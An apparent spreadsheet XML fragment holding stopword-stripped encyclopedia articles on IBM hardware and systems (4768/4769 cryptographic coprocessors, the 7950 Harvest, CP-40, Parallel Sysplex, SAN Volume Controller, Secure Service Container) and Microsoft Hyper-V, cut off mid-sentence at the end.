    <t>4768 pcie cryptographic coprocessor hardware security module (hsm) includes secure cryptoprocessor implemented high-security, tamper resistant, programmable pcie board. specialized cryptographic electronics, microprocessor, memory, random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed. sensitive material never exposed outside physical secure boundary clear format. 4768 validated fips 140-2 level highest level certification achievable commercial cryptographic devices. achieved pci-hsm certification. 4768 data sheet describes coprocessor detail. supplies cryptographic-system implementations: pkcs#11 implementation creates high-security solution application programs developed industry-standard api. common cryptographic architecture (cca) implementation provides many functions special interest finance industry, extensive support distributed management, base custom processing cryptographic functions added.applications include financial transactions, bank-to-clearing-house transactions, transactions integrated circuit (chip) based credit cards, general-purpose cryptographic applications using symmetric algorithms, hashing algorithms, public algorithms. operational keys (symmetric private) generated coprocessor saved either keystore file application memory, encrypted master coprocessor. coprocessor identical master keys. performance benefits include incorporation elliptic curve cryptography (ecc) format preserving encryption (fpe) hardware. supports 4768 certain mainframes crypto express6s (cex6s) feature code 0893. 4768 cex6s part ibm's support pervasive encryption drive encrypt data.in september 2019 successor 4769 announced. references external links these links point various relevant cryptographic standards. 13491 secure cryptographic devices: https://www.iso.org/standard/61137.html 9564 security: https://www.iso.org/standard/68669.html ansi x9.24 part management using symmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-1-2017 ansi x9.24 part management using asymmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-2-2016 fips 140-2: https://nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf payment card industry (pci) transaction security (pts): hardware security module (hsm) modular security requirements: search site: https://www.pcisecuritystandards.org/document_library</t>
  </si>
  <si>
    <t>IBM 4769</t>
  </si>
  <si>
    <t>4769 pcie cryptographic coprocessor hardware security module (hsm) includes secure cryptoprocessor implemented high-security, tamper resistant, programmable pcie board. specialized cryptographic electronics, microprocessor, memory, random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed. sensitive material never exposed outside physical secure boundary clear format. 4769 designed meet fips 140-2 level highest level certification achievable commercial cryptographic devices. 4769 part ibm's pervasive encryption enterprise security schemes. 4769 data sheet describes coprocessor detail. supplies cryptographic-system implementations: pkcs#11 implementation, called enterprise pkcs11 (ep11), creates high-security solution application programs developed industry-standard api. common cryptographic architecture (cca) implementation provides many functions special interest finance industry, extensive support distributed management, base custom processing cryptographic functions added.applications include financial transactions, bank-to-clearing-house transactions, transactions integrated circuit (chip) based credit cards, general-purpose cryptographic applications using symmetric algorithms, hashing algorithms, public algorithms. operational keys (symmetric asymmetric private (rsa elliptic curve)) generated coprocessor saved either keystore file application memory, encrypted master coprocessor. coprocessor identical master keys. elliptic curve cryptography (ecc) information ecc. hardware 4769 adds support accelerate elliptic curves 25519 ed448, well format preserving encryption (fpe) algorithms ff1, ff2, ff2.1, ff3, ff3.1. supports 4769 certain mainframes crypto express7s (cex7s) feature codes 0898 0899. 4769 cex7s part ibm's support pervasive encryption drive encrypt data. references external links general overview cryptography: https://www.garykessler.net/library/crypto.html these links point various relevant cryptographic standards. 13491 secure cryptographic devices: https://www.iso.org/standard/61137.html 9564 security: https://www.iso.org/standard/68669.html ansi x9.24 part management using symmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-1-2017 ansi x9.24 part management using asymmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-2-2016 fips 140-2: https://nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf payment card industry (pci) transaction security (pts): hardware security module (hsm) modular security requirements: search site: https://www.pcisecuritystandards.org/document_library</t>
  </si>
  <si>
    <t>IBM 7950 Harvest</t>
  </si>
  <si>
    <t>7950, also known harvest, one-of-a-kind adjunct stretch computer installed united states national security agency (nsa). built ibm, delivered 1962 operated 1976, decommissioned. harvest designed used cryptanalysis. development april 1958, final design nsa-customized version ibm's stretch computer approved, machine installed february 1962. design engineer james pomerene, built poughkeepsie, york. electronics (fabricated kind discrete transistors used stretch) physically twice stretch attached. harvest added small number instructions stretch, could operate independently. nsa-conducted evaluation found harvest powerful best commercially available machine factor 200, depending task. architecture equipment added stretch computer consisted following special peripherals: 7951 stream coprocessor 7952 high performance core storage 7955 magnetic tape system, also known tractor 7959 high speed exchangewith stream processing unit, harvest able process million characters second.the tractor tape system, part harvest system, unique time. included tape drives, handled 1.75-inch-wide tape cartridges, along library mechanism could fetch cartridge library, mount drive, return library. transfer rates library mechanism balanced performance system could read streams data tape, write third, entire capacity library, without time wasted tape handling. programming harvest's important mode operation called "setup" mode, processor configured several hundred bits information processor operated streaming data memory possibly taking streams memory writing separate stream back memory. byte streams could combined, used find data tables, counted determine frequency various values. value could anything contiguous bits, without regard alignment, streams could simple data laid memory, data read repeatedly, control multiply-nested "do"-loop descriptors, interpreted hardware. programming languages, alpha beta (not confused simula-inspired beta programming language) designed programming provided compiler former around time machine delivered. usage purpose machine search text words watchlist. from single foreign cipher system, harvest able scan seven million decrypts occurrences 7,000 words four hours.the computer also used codebreaking, enhanced early distributed networking system codenamed rye, allowed remote access harvest. according 1965 report, "rye made possible agency locate many potentially exploitable cryptographic systems 'bust' situations. many messages would taken hours days read hand methods, indeed process feasible all, 'set' machine decrypted matter minutes". harvest also used decipherment solved systems; report goes that, "decrypting large batch messages solved system [is] also routinely handled system". harvest-rye system became influential example computer security; 1972 review identified nsa’s “examples early attempts achieving ‘multi-level’ security.”harvest remained 1976, operation fourteen years. part reason retirement mechanical components tractor worn beyond use, practical replace them. declined re-implement architecture modern technology. also cryptanalytic computer references (may 1957). preliminary manual, harvest system (pdf). (november 1957). revised manual, harvest system (pdf). sources james bamford, body secrets, 2001, isbn 0-385-49908-6. s.g. campbell, p.s. herwitz j.h. pomerene nonarithmetical system extension, 254–271 w.buchholz, planning computer system: project stretch, mcgraw-hill, 1962. scanned version on-line (10.4mb) douglas hogan general special-purpose computers: historical look some lessons learned, national security agency, 1986. scanned version on-line (1.1mb) samuel simon snyder history general-purpose electronic digital computers, 39–64, national security agency, 1964. scanned version on-line (3.3mb) external links eric smith, stretch (aka 7030 data processing system) warren alva hunt, early history harvest computer timeline stretch/harvest (1956-1961) tractor (ibm history page)</t>
  </si>
  <si>
    <t>IBM CP-40</t>
  </si>
  <si>
    <t>cp-40 research precursor cp-67, turn part ibm's then-revolutionary cp[-67]/cms virtual machine/virtual memory time-sharing operating system system/360 model parent ibm's family. cp-40 multiple instances client operating systems particularly cms, cambridge monitor system, built part effort. like cp-67, cp-40 first version developed ibm's cambridge scientific center (csc) staff, working closely researchers project lincoln laboratory. cp-40/cms production began january 1967. cp-40 unique, specially modified system/360 model project goals cp-40 one-off research system. declared goals were: provide research input system/360 model team working poughkeepsie, breaking ground as-yet-unproven concept virtual memory. support csc's time-sharing requirements cambridge.however, also important unofficial mission: demonstrate ibm's commitment capability supporting time-sharing users like mit. cp-40 (and successor) achieved goals technical social standpoints helped prove viability virtual machines, establish culture time-sharing users, launch remote computer services industry. however, project became embroiled internal political time-sharing versus batch processing; failed hearts minds academic computer science community, ultimately turned away systems like multics, unix, tenex, various operating systems. ultimately, however, virtualization concepts developed cp-40 project bore fruit diverse areas, remain important today. features cp-40 first operating system implemented complete virtualization, i.e. provided virtual machine environment supporting aspects target computer system s/360-40), s/360 operating systems could installed, tested, used stand-alone machine. cp-40 supported fourteen simultaneous virtual machines. each virtual machine "problem state" privileged instructions operations caused exceptions, caught control program simulated. similarly, references virtual memory locations present main memory cause page faults, handled control program rather reflected virtual machine. further details implementation found cp/cms (architecture). basic architecture user interface cp-40 carried forward cp-67/cms, evolved become ibm's current product line. hardware platform model available building cp-40, custom virtual memory device based associative memory (the "cat box") designed built csc. involved hardware microcode changes specially modified system/360 model these changes gave unit technology needed full virtualization system/360 hardware. this modified model influenced design forthcoming model intended meet needs community time-sharing users (notably mit's project bell laboratories though sites became notable sales failures). three distinct virtual memory systems implemented period: "blaauw box" (named gerry blaauw), part original design s/360-67 "cat box" (cambridge address translator), added csc's s/360-40 cp-40 "dat box" (dynamic address translation), announced addition s/370 series 1972these systems different, bore family resemblance. cp-40's milestone. pugh cite ieee paper cp-40 virtual memory hardware, states "unique included parallel-search register bank speed dynamic address translation. with funds supplied cambridge, engineer[s]...built 64-register associative memory integrated 360/40. one-of-a-kind result shipped cambridge early 1966." important note that, although virtualization support explicit goal csc's modified model apparently case original model design. fact virtualization capabilities ultimately implemented -67, thus enabled success cp-67/cms, speaks tenacity persuasiveness team. cp-40 first built 1964 'client' operating system cp-40. project leader john harmon. although s/360 operating system could cp-40 virtual machine, decided new, simple, single-user interactive operating system would best supporting interactive time-sharing users. this would avoid complexity overhead running multi-user system like ctss. (contrast ibm's os/mvt-tso successors essentially time-sharing operating system running single task batch operating system. with cms, interactive user gets private virtual machine.) september 1965, many important design decisions already made: user-friendly commands, default-mode, non-required parameters wherever possible (for ease training, minimize control requirements) basic file system commands macros; simple file naming convention, based filename, filetype, filemode (filemode logical disk identifier minidisk, form drive letter assignment) records mapped fixed-size blocks, could read written relative record number files could created simply writing them, without need special 'create' operations default filemodes, allowing disks searched fixed orderthese radical departures difficult file naming, control (via jcl), requirements ibm's "real" operating systems. (some concepts goals operating systems vendors, control data corporation dec.) file system design, flat directory structure, kept deliberately simple. creasy notes: "this structure multiple disks, single directory, chosen simple useful. multi-level linked directories, files stored common areas, design trend began. simplified design components reduce implementation complexity."application programs running executed within address space. they accessed system services, file system, simple programming interface nucleus, resided memory within virtual machine. variety system calls provided, would familiar current programmers. (since applications virtual machine, could potentially misbehave, overwriting data, using privileged instructions, taking actions could take crash virtual machine. course, could affect virtual machines, mutually isolated; could damage underlying control program. unlike operating systems, crashes rarely stemmed application errors thus relatively rare.) historical notes following notes provide brief quotes, primarily pugh, varian, creasy [see references], illustrating development context cp-40. direct quotes rather paraphrases provided here, authors' perspectives color interpretations. also history cp/cms additional context. genesis cp-40 project: csc's rasmussen felt "very dubious" tss/360 decided idle resources creating "credible time-sharing system s/360", became known cp-40. project leader robert creasy, ctss programmer. cp-40 goals included conducting research (obtaining analyzing data systems software, including associative memory) meeting csc's computing requirements time-sharing. varian adds: "the project’s real purpose build time-sharing system, objectives genuine, too, always emphasized order disguise project’s “counter-strategic” aspects." creasy describes cp/cms goals way: second generation time-sharing system newly announced system/360...[that would] support activities cambridge center, including diverse activities operating system research, application development, report preparation programmers, scientists, secretaries, managers. soon inception, convenient system recognized financially supported outside center tool evaluate test performance operating systems." csc's research important ibm, time, "not much really known virtual memory systems." varian quotes l.w. comeau: "[ibm's] commitment virtual memory backed successful experience.... what frightening nobody setting virtual memory direction knew [the contemporary virtual memory system ferranti] atlas didn’t work." (comeau later concluded atlas suffered thrashing, studied observed m44/44x cp-40.) cp-40 design: pugh write that: 1964...ibm research recommending virtual-machine principles time-sharing planners...[which were] picked cambridge [csc] team, wanted, among things, system capable testing operating systems." design decision, made creasy comeau 1964, base cp-40 virtual memory virtual machines first called pseudo-machines, later term appropriated m44/44x project creasy describes "similar independent ideas." creasy provides clear description cp's virtualization strategy, based s/360 instruction set, consisted privileged 'supervisor state' instructions distinct normal 'problem state' instructions: "each [cp] virtual machine program actually executed [entirely] problem state.... privileged instructions...[are] reproduced within virtual machines...." running problem state, 'tricky' instructions would automatically intercepted hardware. this left main virtualization problem: memory references. "experience [with ctss]...suggested need dynamic program relocation...to break programs pieces could moved into, within memory independently other." cp-40 virtual machines: earlier research projects involving virtual machine concept, m44/44x, attempted create exact virtual duplicate real machine. creasy: "[they were] close enough...to prove 'close enough' count." cp-40 took bold step full virtualization, creating fourteen virtual s/360 environments, fixed virtual memory size 256k, mapped access disk partitions, spooled access unit record devices (e.g. printers). comeau: "[creating full virtualization] permitted simultaneous development cms; allowed measure non-virtual systems, dos, virtual memory environment, also provided high level integrity security." addition revealing value full virtualization, experimental m44/44x "implanted idea virtual machine concept necessarily less efficient conventional approaches" core assumption cp-40 architecture, ultimately proved successful. cp-40 would soon support dozen virtual system/360 machines" terminal control [most sources state fourteen]. (cp-67 later "exploited...address-translation...and increased speed...to double capacity" cp-40.) cp-40:about decision separate creasy writes: "the implementation ctss illustrated necessity modular design system evolution. although successful production system, interconnections dependencies supervisor design made extension change difficult. concept cp/cms design bifurcation computer resource management user support. effect, integrated design ctss] split cms." value experience gained ctss project cannot overstated.about early cms, creasy writes: "provided single user service unencumbered problems sharing, allocation, protection." early development involved booting bps, early s/360 support system, enough along boot stand-alone. eventually development moved virtual machines also cp[-67]/cms: widely used successor cp-40, precursor ibm's systems cambridge scientific center, cp-40 cp/cms built m44/44x, contemporary experimental paging system history cp/cms, review events issues leading creation cp-40 time-sharing system evolution references further reading family tree</t>
  </si>
  <si>
    <t>IBM Parallel Sysplex</t>
  </si>
  <si>
    <t>computing, parallel sysplex cluster mainframes acting together single system image z/os. used disaster recovery, parallel sysplex combines data sharing parallel computing allow cluster systems share workload high performance high availability. sysplex 1990, mainframe computers introduced concept systems complex, commonly called sysplex, mvs/esa spv4.1. this allows authorized components eight logical partitions (lpars) communicate cooperate using protocol. components sysplex include: common time source synchronize member systems' clocks. this involve either sysplex timer (model 9037), server time protocol (stp) global resource serialization (grs), allows multiple systems access resources concurrently, serializing necessary ensure exclusive access cross system coupling facility (xcf), allows systems communicate peer-to-peer couple data sets (cds)users (base) sysplex include: console services allowing merge multiple consoles different members sysplex, providing single system image operations automatic restart manager (arm) policy direct automatic restart failed jobs started tasks system available another lpar sysplex sysplex failure manager (sfm) policy specifies automated actions take certain failures occur loss member sysplex reconfiguring systems workload manager (wlm) policy based performance management heterogeneous workloads across z/os images even global resource serialization (grs) communication allows links instead dedicated channels grs, dynamic rnls tivoli standby support controller racf (ibm's mainframe security software product) sysplex-wide rvary setropts commands pdse file sharing multisystem vlfnote, sdump, slip, resource measurement facility (rmf) sysplex-wide reporting cics uses provide better performance response time using vtam transaction routing function shipping. using communication access data across multiple lpars parallel sysplex introduced parallel sysplex addition 9674 coupling facility (cf), s/390 models, upgrades existing models, coupling links high speed communication mvs/esa v5.1 operating system support, april 1994.the coupling facility (cf) reside dedicated stand-alone server configured processors coupling facility control code (cfcc), integral processors mainframes configured icfs (internal coupling facilities), less common, normal lpars. contains lock, list, cache structures help serialization, message passing, buffer consistency multiple lpars.the primary goal parallel sysplex provide data sharing capabilities, allowing multiple databases direct reads writes shared data. this provide benefits help remove single points failure within server, lpar, subsystems application availability single system image dynamic session balancing dynamic transaction routing scalable capacitydatabases running system server take advantage include: information management system (ims). vsam (vsarm/rls) idms adabas datacom oracleother components coupling facility help system management, performance, reduced hardware requirements. called “resource sharing”, uses include: catalog shared catalogs improve performance reducing catalog data disk cics using provide sharing recovery capabilities named counters, data tables, transient data dfsmshsm workload balancing data migration workload star reduced response time performance data allocation.tape switching uses structure provide sharing tape units z/os images. dynamic chpid management (dcm), priority management jes2 checkpoint provides improved access multisystem checkpoint operlog logrec merged multisystem logs system management racf shared data simplify security management across parallel sysplex websphere shared message queues availability flexibility provides support intelligent resource director (ird) extends z/os workload manager help manage resources across multiple lpars within parallel sysplex. functions include lpar management, ird.multi-system enclave management improved performance star reduced hardware requirements simplified management communication pathsmajor components parallel sysplex include: coupling facility icf) hardware, allowing multiple processors share, cache, update, balance data access; sysplex timers (more recently, server time protocol) synchronize clocks member systems; high speed, high quality, redundant cabling; software (operating system services and, usually, middleware db2).the coupling facility either dedicated external system small mainframe, system specially configured coupling facility processors) integral processors mainframes configured icfs (internal coupling facilities). recommended least external used parallel sysplex. recommended parallel sysplex least and/or icfs redundancy, especially production data sharing environment. server time protocol (stp) replaced sysplex timers beginning 2005 system mainframe models z990 newer. sysplex timer physically separate piece hardware mainframe, whereas integral facility within mainframe's microcode. with icfs possible construct complete parallel sysplex installation connected mainframes. moreover, single mainframe contain internal equivalent complete physical parallel sysplex, useful application testing development purposes.the systems journal dedicated full issue technology components. server time protocol maintaining accurate time important computer systems. example, transaction-processing system recovery process reconstructs transaction data files. time stamps used transaction-data logging, time stamps related transactions transposed actual sequence, reconstruction transaction database match state recovery process. server time protocol (stp) used provide single time source multiple servers. based network time protocol concepts, system servers designated primary time source (stratum sends timing signals stratum servers coupling links. stratum servers turn send timing signals stratum servers. provide availability, servers designated backup time source, third server designated arbiter assist backup time server determining take role primary exception conditions. available system servers since 2005. more information available “server time protocol planning guide”. geographically dispersed parallel sysplex geographically dispersed parallel sysplex (gdps) extension parallel sysplex mainframes located, potentially, different cities. gdps includes configurations single site multiple site configurations: gdps hyperswap manager: this based synchronous peer peer remote copy (pprc) technology within single data center. data copied primary storage device secondary storage device. event failure primary storage device, system automatically makes secondary storage device primary, usually without disrupting running applications. gdps metro: this based synchronous data mirroring technology (pprc) used mainframes kilometres (120 apart. two-system model, sites administered system. event failure system storage device, recovery occur automatically, limited data loss. gdps global xrc: this based asynchronous extended remote copy (xrc) technology restrictions distance. copies data storage devices sites seconds data lost event failure. failure occur, user must initiate recovery process. once initiated, process automatic recovering secondary storage devices reconfiguring systems. gdps global this based asynchronous global mirror technology restrictions distance. designed recovery total failure site. activate secondary storage devices backup systems. gdps metro global this configuration systems systems/sites, purposes disaster recovery. based gdps metro together gdps global gdps metro global xrc: this configuration systems systems/sites purposes disaster recovery. based gdps metro together gdps global xrc. gdps continuous availability: this disaster recovery continuous availability solution, based sites, separated unlimited distances, running applications data provide cross-site workload balancing. multi-site workload lifeline, monitoring workload routing, plays integral role gdps continuous availability solution. also system lpar references external links parallel sysplex site gdps page</t>
  </si>
  <si>
    <t>IBM SAN Volume Controller</t>
  </si>
  <si>
    <t>volume controller (svc) block storage virtualization appliance belongs system storage product family. implements indirection, "virtualization", layer fibre channel storage area network (san). architecture 2145 volume controller (svc) inline virtualization "gateway" device. logically sits hosts storage arrays, presenting hosts storage provider (target) presenting storage arrays host. physically attached several fabrics. virtualization approach allows non-disruptive replacements part storage infrastructure, including devices themselves. also aims simplifying compatibility requirements strongly heterogeneous server storage landscapes. advanced functions therefore implemented virtualization layer, allows switching storage array vendors without impact. finally, spreading installation across sites (stretched clustering) enables basic disaster protection paired continuous availability. nodes always clustered, minimum maximum nodes, linear scalability. nodes rack-mounted appliances derived system servers, protected redundant power supplies integrated batteries. earlier models featured external battery-backed power supplies. each node fibre channel ports simultaneously used incoming, outgoing, intracluster data traffic. hosts also attached fcoe iscsi gbit ethernet ports. intracluster communication includes maintaining read/write cache integrity, sharing status information, forwarding reads writes port. these ports must zoned together. write cache protected mirroring within pair nodes, called group. virtualized resources storage volumes presented hosts) distributed across groups improve performance. volumes also moved nondisruptively groups, e.g., node pairs added older technology removed. node pairs always active, meaning members accept simultaneous writes volume. addition, cluster nodes accept forward read write requests internally handled appropriate group. path board failures compensated non-disruptive failover within group, optionally across dispersed groups. hosts must multipath drivers installed, subsystem device driver (sdd) standard mpio drivers. based commodity parts storage system (compass) architecture, developed almaden research center. majority software developed hursley labs terminology node single machine.i/o group pair nodes duplicate other's write commands cluster group groups managed single entity. stretched cluster site protection configuration groups, stretched across sites, plus witness site cluster address single address cluster provides administrative interfaces (ssh https) service address address used service individual node. each node service configured. configuration node single node holds cluster's configuration assigned cluster address. master console sspc) management 5.1, based websphere application server; installed node, separate machineas 6.1, master console (sspc) longer used. based administration done directly configuration node, using html5 gui. virtual disk (vdisk) unit storage presented host. release refers vdisk volume. managed disk (mdisk) unit storage lun) real, external disk array, virtualized svc. mdisk base create image mode vdisk. managed disk group (mdisk group) group mdisks. extents mdisks mdisk group base create striped sequential mode vdisk. release refers managed disk group pool. extent discrete unit storage; mdisk divided extents; vdisk formed extents. timeline different volume controller models available purchase shortly mentioned announcement day. light green bars show period time model could ordered, light blue bars show long standard service continued withdrawal marketing. displayed information current august 2019. there differences service conditions 2145 2147, hardware. performance release held storage performance council (spc) world record spc-1 performance benchmarks, returning nearly 275k (274,997.58) iops. there faster storage subsystem benchmarked time (october 2008). spc-2 benchmark also returned world leading measurement gb/s throughput. release achieved records node node cluster benchmark ds8700 backed storage device. broke record 274,997.58 spc-1 iops march 2010, 315,043.59 node cluster 380,489.30 node cluster, records stood october 2011. release held storage performance council (spc) world record spc-1 performance benchmarks, returning 500k (520,043.99) iops (i/os second) using nodes storwize v7000 backend disk. there faster storage subsystem benchmarked time (january 2012). full results executive summaries reviewed website referenced above.release provides multiple enhancements including support additional cpus, cache adapters. streamlined cache operates 100µs fall-through latency cache-hit latency, enabling front-end flashsystem solid-state storage without significant performance penalty. (see also: flashsystem v9000). included features (7.x) indirection mapping virtual physical servers access storage controller. scsi luns represent virtual disks (volumes) allocated pool storage made managed disks (mdisks). managed disk simply storage provided storage controllers virtualizing. virtual capacity larger managed physical capacity, current maximum depending management granularity (extent size) data migration pooling move volumes capacity pool (mdisk group) another whilst maintaining access data. write read caching remain active. pools shrunk expanded removing adding hardware capacity, maintaining access data. both features used seamless hardware migration. migration model recent model also seamless implies copying data. importing exporting existing luns image mode "image mode" non-virtualized pass-through representation mdisk (managed lun) contains existing client data; mdisk seamlessly imported removed cluster. fast-write cache writes hosts acknowledged committed mirrored cache, prior destaged underlying storage controllers. data protected replication peer node group (cluster node pair). cache size dependent hardware model installed options. fast-write cache especially useful increase performance midrange storage configurations. auto tiering (easy tier) automatically selects best storage hardware chunk data, according access patterns. cache unfriendly "hot" data dynamically moved solid state drives ssd, whereas cache friendly data well "cold" data moved economic spinning disks. easy tier also monitors optimizes spindle-only workloads solid state storage attached. idem, easy tier automatically optimizes solid-state workloads enterprise- read intensive flash media. solid state drive (ssd) capability supported external storage device provide internal slots, cluster. these used boost aging spinning disk pools: easy tiering automatically active hybrid mixed-media capacity pools. thin provisioning capacity used data written lun. data blocks equal zero physically allocated, unless previous data unequal zero exists. during import internal migrations, data blocks equal zero discarded (thick-to-thin migration). besides, thin provisioning integrated flashcopy features detailed provide space-efficient snapshots virtual disk mirroring provides ability maintain redundant copies lun, implicitly different storage controllers site protection stretched cluster geographically distributed, highly available clustered storage setup leveraging virtual disk mirroring feature across datacenters within distance. stretched clusters span datacenters (chain ring topology, 4-site cluster requiring cluster nodes). cluster consistency ensured majority voting set. from storage devices datacenters, presents common logical instance. user-side operations like snapshot resizing apply logical instance level. hardware-oriented operations like real-time compression live hardware migration occur physical instance level. unlike classical mirroring, logical luns readable writable sides (tandem) time, removing need failover, role switch, site switch found site recovery managing products. feature combined live partition mobility vmotion avoid bulk data transport metro-distance virtual server motion. geographical crossover access cluster nodes stretched cluster read/write access storage hardware mirror location, removing need site-resynchronization case single node failures. this feature mutually exclusive enhanced stretched cluster, recommended single stretched node pairs. standby nodes powered nodes take role failed nodes stretched local cluster short notice. enhanced stretched cluster functionality optimizing data paths within metro- geo-distance stretched cluster (see above), helpful bandwidth sites scarce cross-site traffic must minimized. attempt shortest path reads writes. instance, cache write destaging storage devices always performed nearby cache copy, unless peer cache copy down. node pairs recommended minimum enhanced stretched cluster. stretched cluster golden copy (3-site stretched cluster maintains additional synchronous asynchronous data copy independent stretched cluster storwize device distances. golden copy disaster protection metro-scale outages impacting stretched cluster whole. relies licensed metro- global mirror functionality. hyperswap ability seamlessly fail data access geographically dispersed groups clusters. stretched cluster, sides accept simultaneous writes, write cache data mirrored locally sites groups kept together. hyperswap combined live partition mobility vmotion maximized application availability. server side, hyperswap works native multipath drivers alua support. hyperswap relies metro mirror functionality requires metro mirror license, well minimum node pairs. transparent cloud tiering swift- s3-compatible object datastores used cold tier incremental volume snapshots volume archives without live production access. this allows keeping hourly time machine copies archiving images including attached volumes price point somewhat closer tape media. on-premise datastore support provided openstack swift. off-premise datastore support provided amazon softlayer. off-premise transparent cloud tiering default uses encryption, licensed feature. optional features there optional features, separately licensed e.g. real-time compression this in-flight data reduction technology offers footprint reduction (guaranteed) (found oracle databases). leveraging dedicated compression hardware, generally performance impact usable heavy duty databases. temporal locality algorithm even increase read performance adequate data patterns databases stored spinning disks. compression efficiency equal "zip" (lempel–ziv–welch) large dictionary, accurately predicted across petabytes using comprestimator tool. real-time compression combined easy tiering, thin provisioning virtual disk mirroring. initially invented acquired startup storwize inc., also served name svc-derived storage systems family. flashcopy (snapshot) this used create disk snapshot backup/rollback application testing single volume. snapshots require "delta" capacity unless created full-provisioned target volumes. flashcopy comes three flavours: snapshot, backup volume, clone, automatically unlinked source. based optimized copy-on-write technology. source volume simultaneous targets. targets made incremental, cascaded tree like dependency structures constructed. targets re-applied source appropriate volume, also different size (e.g. resetting changes resize command). copy-on-write based bitmap configurable grain size, opposed journal. flashcopy rollback (time machine) provides time-machine inspired rollback capability using selectively granular consistency points. consistency mechanism cover many luns time. rollback requires flashcopy license spectrum control snapshot software. metro mirror synchronous remote replication this allows remote disaster recovery site distance 300km global mirror asynchronous remote replication this allows remote disaster recovery site distance thousands kilometres. each global mirror relationship configured high latency bandwidth high latency high bandwidth connectivity, latter allowing consistent recovery point objective sec. global mirror remote replication internet uses sanslide technology integrated firmware send mirroring data traffic across tcp/ip link, maximizing bandwidth efficiency link. this result 100x data transfer acceleration long distances. encryption data rest spectrum virtualize-based devices transparently encrypt data local media, virtualized attached storage, cloud tier (per default). encryption mechanism 256-bit aes-xts. keys either generated locally stored removable thumb drives obtained lifecycle management service. both options mutually exclusive. other products running code october 2010, announced storwize v7000, first member storwize family. storwize uses volume controller code base internal storage provide mid-price storage subsystem. storwize v5000, v3700 v3500 shrunk compatible models less cache/cpu/adapters reduced features. flashsystem v9000 leverages firmware integrated flashsystem solid-state drawers. 2015, re-badged virtualization functionality spectrum virtualize, order align software-defined storage naming conventions highlight interoperability aspect. non-ibm products running code actifio protection availability storage (pas) appliance includes elements code achieve wide interoperability. platform spans backup, disaster recovery, business continuity among functions. also subsystem device driver (sdd), multipathing driver system storage, originally used enterprise storage server vplex, competing solution storwize family footnotes references external links links redbooks, info, updates official storage virtualization page official page official redbooks page official redbooks page storwize v7000</t>
  </si>
  <si>
    <t>IBM Secure Service Container</t>
  </si>
  <si>
    <t>secure service container trusted execution environment available linuxone servers. history 2016 introduced appliance container infrastructure ("zaci") feature z13, z13s, linuxone rockhopper, linuxone emperor servers, delivered driver (firmware) update (driver level 27). originally conceived trusted execution environment best suited software "appliances," z/vse network appliance, zaware, gdps virtual appliance offerings. improved zaci broadened applicability, company quickly changed name secure service container (ssc) linuxone emperor models launched 2017. details secure service container consists combination hardware, firmware, software technologies commercially available recent linuxone servers. hardware firmware elements primarily extensions ibm's pr/sm logical partitioning technologies common criteria enterprise assurance level (eal) certified separation isolation. logical partition (lpar) type "ssc" available, usable main system memory allocated lpar (the limit emperor server models introduced 2017). also supplies generalized, open source-based software framework sscs form secure service container cloud private paired, firmware-based enabling feature. this generalized software framework facilitates running conventional virtual machines (vms) docker containers linux within ssc, without requiring special programming adapt architecture. words, secure service container (ssc) outer "envelope" within software containers (such docker containers) highly secure, trusted execution environment. uses sscs host many public cloud services, including cloud hyper protect services. first adopters technologies include organizations extremely demanding security requirements, including digital asset cryptocurrency firms digital asset custody services (dacs). most organizations using secure service container also rely heavily services ibm's fips 140-2 level certified crypto express hardware security modules trusted entry (tke) equipment provide, although linuxone system features also used separately, own. also mainframe linux cloud hyper protect references</t>
  </si>
  <si>
    <t>Hyper-V</t>
  </si>
  <si>
    <t>microsoft hyper-v, codenamed viridian, briefly known release windows server virtualization, native hypervisor; create virtual machines x86-64 systems running windows. starting windows hyper-v superseded windows virtual hardware virtualization component client editions windows server computer running hyper-v configured expose individual virtual machines networks. hyper-v first released windows server 2008, available without additional charge since windows server 2012 windows standalone windows hyper-v server free, command-line interface only. last version free hyper-v server hyper-v server 2019, based windows server 2019. history beta version hyper-v shipped certain x86-64 editions windows server 2008. finalized version released june 2008 delivered windows update. hyper-v since released every version windows server.microsoft provides hyper-v channels: part windows: hyper-v optional component windows server 2008 later. also available skus enterprise editions windows windows 8.1, windows windows hyper-v server: freeware edition windows server limited functionality hyper-v component. hyper-v server hyper-v server 2008 released october 2008. consists windows server 2008 server core hyper-v role; windows server 2008 roles disabled, limited windows services. hyper-v server 2008 limited command-line interface used configure host physical hardware, software. menu driven interface freely downloadable script files simplify configuration. addition, hyper-v server supports remote access remote desktop connection. however, administration configuration host guest virtual machines generally done network, using either microsoft management consoles another windows computer system center virtual machine manager. this allows much easier "point click" configuration, monitoring hyper-v server. hyper-v server 2008 edition windows server 2008 made available september 2009 includes windows powershell greater control. remote access hyper-v server requires configuration network interfaces windows firewall. also using windows vista administer hyper-v server 2008 fully supported. architecture hyper-v implements isolation virtual machines terms partition. partition logical unit isolation, supported hypervisor, guest operating system executes. there must least parent partition hypervisor instance, running supported version windows server (2008 later). virtualization software runs parent partition direct access hardware devices. parent partition creates child partitions host guest oss. parent partition creates child partitions using hypercall api, application programming interface exposed hyper-v.a child partition access physical processor, handle real interrupts. instead, virtual view processor runs guest virtual address, which, depending configuration hypervisor, might necessarily entire virtual address space. depending configuration, hyper-v expose subset processors partition. hypervisor handles interrupts processor, redirects respective partition using logical synthetic interrupt controller (synic). hyper-v hardware accelerate address translation guest virtual address-spaces using second level address translation provided cpu, referred intel (formerly npt) amd. child partitions direct access hardware resources, instead virtual view resources, terms virtual devices. request virtual devices redirected vmbus devices parent partition, manage requests. vmbus logical channel enables inter-partition communication. response also redirected vmbus. devices parent partition also virtual devices, redirected reaches parent partition, gain access physical devices. parent partitions virtualization service provider (vsp), connects vmbus handles device access requests child partitions. child partition virtual devices internally virtualization service client (vsc), redirect request vsps parent partition vmbus. this entire process transparent guest virtual devices also take advantage windows server virtualization feature, named enlightened i/o, storage, networking graphics subsystems, among others. enlightened specialized virtualization-aware implementation high level communication protocols, like scsi, allows bypassing device emulation layer takes advantage vmbus directly. this makes communication efficient, requires guest support enlightened i/o. currently following operating systems support enlightened i/o, allowing therefore faster guest operating systems hyper-v operating systems need slower emulated hardware: windows server 2008 later windows vista later linux later kernel freebsd system 